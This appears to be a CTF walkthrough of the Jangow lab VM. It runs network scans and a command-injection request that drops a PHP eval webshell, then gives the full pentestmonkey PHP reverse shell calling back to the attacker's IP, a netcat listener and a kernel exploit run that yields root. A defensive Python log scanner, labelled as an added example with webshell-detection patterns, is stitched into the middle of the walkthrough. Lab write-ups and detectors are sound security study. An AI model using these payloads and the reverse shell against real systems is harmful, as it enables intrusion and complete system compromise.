Jangow

$ sudo nmap -sP 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.1
Host is up (0.00042s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.055s latency).
MAC Address: 62:95:C5:46:4A:54 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.17s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.107
Host is up (0.20s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.110
Host is up (0.00017s latency).
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.37 seconds
$ sudo nmap -sV -sC -A 192.168.0.110
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.110
Host is up (0.00029s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.0.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds
$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.110 -t 40 --exclude-status 403,401,429
  _|._ __  __ _|_    v0.4.2.3
 (_|||_) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 10780

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.110_22-04-02_15-12-37.txt

Target: http://192.168.0.110/

[15:12:43] Starting:
[15:12:43] 200 -  336B  - /.backup
[15:13:03] 301 -  313B  - /site  ->  http://192.168.0.110/site/
[15:13:03] 200 -   10KB - /site/
http://192.168.0.110/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%27a%27])%20?%3E%27%20%3E%20hack.php
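The request above is exactly what the web server's access log records when a search parameter is abused to write a PHP file into the document root. As an added example (not part of the original post or of the Jangow VM), here is a small Python scanner that decodes each logged query string, flags the indicators a defender would alert on (PHP open tag, eval/system calls, superglobals, shell metacharacters, redirection into a .php file) and then correlates any later request to the file that was written. The log lines are constructed for the example; the first one mirrors the request shown in the write-up, the client addresses, timestamps and user agents are assumed.

```python
"""Flag command-injection and webshell-drop attempts in Apache access logs.

Added example for this write-up; not code from the original post or the VM.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-log lines (not from the page). Line 1 mirrors the
# busque.php?buscar=... request in the write-up; the rest are assumed traffic.
SAMPLE_LOG = """\
192.168.0.104 - - [02/Apr/2022:15:20:11 -0600] "GET /site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%27a%27])%20?%3E%27%20%3E%20hack.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.104 - - [02/Apr/2022:15:20:15 -0600] "POST /site/hack.php HTTP/1.1" 200 104 "-" "python-requests/2.27"
192.168.0.50 - - [02/Apr/2022:15:21:02 -0600] "GET /site/busque.php?buscar=manzana HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.0.50 - - [02/Apr/2022:15:21:09 -0600] "GET /site/busque.php?buscar=ls%20-la%3Bid HTTP/1.1" 200 3010 "-" "curl/7.68"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the *decoded* parameter value.
INDICATORS = [
    ("php_tag", re.compile(r"<\?php|<\?=", re.I)),
    ("php_eval", re.compile(r"\b(eval|system|shell_exec|passthru|exec)\s*\(", re.I)),
    ("php_superglobal", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("shell_metachar", re.compile(r"[;|`$]|&&|\|\|")),
    ("file_write", re.compile(r">\s*\S+\.(php|phtml|phar)\b", re.I)),
]
# Captures the file name a redirection writes, so later hits on it can be correlated.
FILE_WRITE_RE = re.compile(r">\s*(\S+\.(?:php|phtml|phar))\b", re.I)


def decode_params(target):
    """Split a request target into its path and fully decoded query parameters."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # decodes once
    # A second pass catches double-encoded payloads (%2527 -> %27 -> ').
    return parts.path, [(k, unquote_plus(v)) for k, v in params]


def scan_log(text):
    """Return one finding per suspicious request, in log order.

    A request whose path is a file that an earlier request wrote is flagged as
    webshell use even though it carries no suspicious parameters itself.
    """
    findings, dropped = [], set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = decode_params(m["target"])
        hits = []
        for key, value in params:
            for name, rx in INDICATORS:
                if rx.search(value):
                    hits.append(f"{key}:{name}")
            for fname in FILE_WRITE_RE.findall(value):
                dropped.add(fname.rsplit("/", 1)[-1])
        if path.rsplit("/", 1)[-1] in dropped:
            hits.append("path:webshell_use")
        if hits:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "method": m["method"],
                "path": path, "status": m["status"],
                "indicators": sorted(set(hits)),
            })
    return findings


def risk_score(finding):
    """Crude severity: PHP written to a .php file, or use of it, is a webshell."""
    kinds = {h.split(":", 1)[1] for h in finding["indicators"]}
    if "webshell_use" in kinds or {"php_tag", "file_write"} <= kinds:
        return "critical"
    if "php_tag" in kinds or "php_eval" in kinds:
        return "high"
    if "shell_metachar" in kinds:
        return "medium"
    return "low"


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(risk_score(f).upper(), f["ip"], f["method"], f["path"], f["indicators"])
```

Running the script on the sample log reports the dropped webshell as critical, the follow-up POST to hack.php as critical by correlation, ignores the benign search, and rates the bare `;id` probe medium. In production the same logic would be fed from the live access log and paired with the stronger fix: the search handler must never pass the parameter to a shell at all.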
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.104';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
 $pid = pcntl_fork();
 
 if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
 }
 
 if ($pid) {
  exit(0);  // Parent exits
 }
 if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
 }

 $daemon = 1;
} else {
 printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
 printit("$errstr ($errno)");
 exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
 printit("ERROR: Can't spawn shell");
 exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
 if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
 }

 if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
 }

 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

 if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
 }

 if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
 }

 if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
 }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

?>
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.110] 34204
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 13:05:30 up 59 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
www-data@jangow01:/$ cd /var/www/html/site 
www-data@jangow01:/var/www/html/site$ ls
45010.c  busque.php  hack.php index.html  wordpress
assets  css      hack1.php js
www-data@jangow01:/var/www/html/site$ chmod +x 45010.c
www-data@jangow01:/var/www/html/site$ gcc 45010.c
www-data@jangow01:/var/www/html/site$ ./a.out 
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   **This vulnerability cannot be exploited at all on authentic grsecurity kernel**
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035959c00
[*] Leaking sock struct from ffff8800381252c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003ad06e40
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003ad06e40
[*] credentials patched, launching shell...
# cd /root 
cd /root

# ls

ls
proof.txt

# cat proof.txt

cat proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*./@@*   &@@
                       @  @@@@@*(@@@@@@@@@#/.               .*@.  .#&.   &@@@&&
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@
@@/*@@@@@@@/           @@@@@@@@@@@#                      @@
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@
                       @&   .@@@@@@@@.         , @@@@@@@ *.@@@*(    .@
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&
                       @  @@@@@@@@&               JANGOW               &@@@
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&
                                     &&&@@@@&%       &/    (&&@@@&&&
                                       (((((((((((((((((((((((((((((

da39a3ee5e6b4b0d3255bfef95601890afd80709

#